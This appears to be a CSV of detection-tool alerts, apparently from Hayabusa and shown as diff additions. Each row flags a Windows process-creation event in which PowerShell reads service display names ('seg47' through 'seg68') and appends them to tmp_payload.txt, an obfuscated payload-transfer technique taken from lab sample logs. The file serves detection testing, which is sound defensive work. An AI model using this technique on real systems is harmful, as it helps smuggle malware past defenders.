+2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb70 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:35.192 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:35.208 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:36.629 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:36.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:45.315 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:45.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:48.220 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:48.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:51.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:51.118 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:52.551 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:52.566 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:55.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:55.453 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:56.883 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:56.898 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:04.183 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:04.198 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:05.632 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:05.648 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
